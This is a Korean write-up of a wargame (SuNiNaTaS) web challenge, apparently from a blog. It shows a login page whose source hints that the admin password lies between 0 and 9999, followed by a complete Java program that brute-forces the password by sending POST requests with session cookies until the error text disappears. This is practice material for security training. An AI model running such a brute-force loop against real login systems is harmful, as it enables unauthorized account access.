[SuNiNaTaS] 8번

시작화면

 

소스보기

<!DOCTYPE html>

<html>
<head>
    <title>Game 08</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="shortcut icon" href="/static/img/game.ico" />
</head>
<body>
    <form method="post" action="./web08.asp">
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <table width="240" cellpadding="0" cellspacing="0" align="center">
            <tr height="30">
                <td width="50%" class="table_top" align="center">
                    <input type="button" name="main_btn" value="main" style="width: 60" onclick="location.href = '/'"></td>
                <td width="50%" class="table_top" align="center">
                    <input type="button" name="main_btn" value="Back" style="width: 60" onclick="history.back()"></td>
            </tr>
            <tr height="30" class="table_main">
                <td width="120" align="center" bgcolor="cccccc"><font size="2"><b>ID</b></font></td>
                <td width="120" align="center" bgcolor="cccccc">
                    <input type="text" name="id" style="width: 90"></td>
            </tr>
            <tr height="30" class="table_main">
                <td align="center" bgcolor="cccccc"><font size="2"><b>PW</b></font></td>
                <td align="center" bgcolor="cccccc">
                    <input type="password" name="pw" style="width: 90" maxlength="4"></td>
            </tr>
            <tr height="30">
                <td colspan="2" align="center" class="table_top" bgcolor="cccccc">
                    <input type="button" name="btn" value="Login" onclick="submit()" size="20"></td>
            </tr>
            <tr class="table_main" height="30">
                <td colspan="2" align="center" bgcolor="cccccc">Password Incorrect!</td>
            </tr>
        </table>
    </form>
</body>
</html>


<!-- Hint : Login 'admin' Password in 0~9999 -->
<!-- M@de by 2theT0P -->

힌트보면

비밀번호가 0~9999란다

 

브루트포스 해보면 된다.

[JAVA]

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class httppost {
    public static void main(String args[]) throws Exception{
        
        for (int j = 0; j < 10000; j++) {
            URL url = new URL("http://suninatas.com/challenge/web08/web08.asp");
            HttpURLConnection hc = (HttpURLConnection) url.openConnection();
            
            hc.addRequestProperty("Cookie", "ASP.NET_SessionId=본인세션; ASPSESSIONIDCABBSAQA=본인세션");
            hc.addRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            hc.setRequestMethod("POST");
            hc.setDoInput(true);
            hc.setDoOutput(true);
            
            String param = "id=admin&pw="+j;
            
            OutputStream opstraem = hc.getOutputStream();
            opstraem.write(param.getBytes());
            opstraem.flush();
            opstraem.close();
            
            StringBuilder sb = new StringBuilder();
            BufferedReader br = new BufferedReader(new InputStreamReader(hc.getInputStream()));
            String s;
            while ((s = br.readLine()) != null)
                sb.append(s);
            
            if (sb.indexOf("Incorrect") == -1) {
                System.out.print(String.format("%d", j));
                break;
            }
        }
    }
}